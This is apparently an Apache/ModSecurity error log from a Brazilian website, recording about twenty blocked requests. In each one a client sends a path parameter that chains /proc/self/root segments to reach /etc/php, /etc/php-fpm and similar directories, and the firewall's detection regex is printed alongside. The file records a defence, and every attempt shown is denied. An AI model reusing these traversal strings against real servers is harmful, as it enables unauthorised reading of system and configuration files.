https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:11.938474 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:33482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJuymAPhZkrhU8w4ksigAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:13.227420 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:33486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJvfu8EFLIOrSqIpvFVAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:14.527580 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:33488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJvta6ubjKNq_cu4ZVBgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:44:17.995194 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:33504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJwfu8EFLIOrSqIpvFWwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:22.931535 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:33512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJxgkwaGbbGflqUZDRrwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:25.879425 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:37406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJyUzinOy1jxa1j4fQvwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:26.734584 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:45020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJyvu8EFLIOrSqIpvFXgAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:44:28.075021 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:45036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJzAkwaGbbGflqUZDRsQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:30.511916 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:45038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJzuw_le52K8_3pV2e5gAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:35.185236 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:55150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ0-w_le52K8_3pV2e7AAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:44:38.704737 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:55152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ1gkwaGbbGflqUZDRtgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:42.164043 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:32980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ2gkwaGbbGflqUZDRuwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:45.903067 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:32988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ3dY0UrI5A3LftIxP1wAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:47.271145 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:32992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ39Y0UrI5A3LftIxP2gAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:48.199935 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:51526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ4CmAPhZkrhU8w4ksowAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:44:52.779240 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:46816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ5AkwaGbbGflqUZDRwwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:52.971051 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:33000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ5NY0UrI5A3LftIxP4gAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:44:55.871874 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:44276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ59a6ubjKNq_cu4ZVGwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:57.227022 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:44284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ6dY0UrI5A3LftIxP5QAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:44:58.560909 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:44292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ6gkwaGbbGflqUZDRxwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:02.939755 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:44148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ7sdf6f5d65gmYZSPUAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
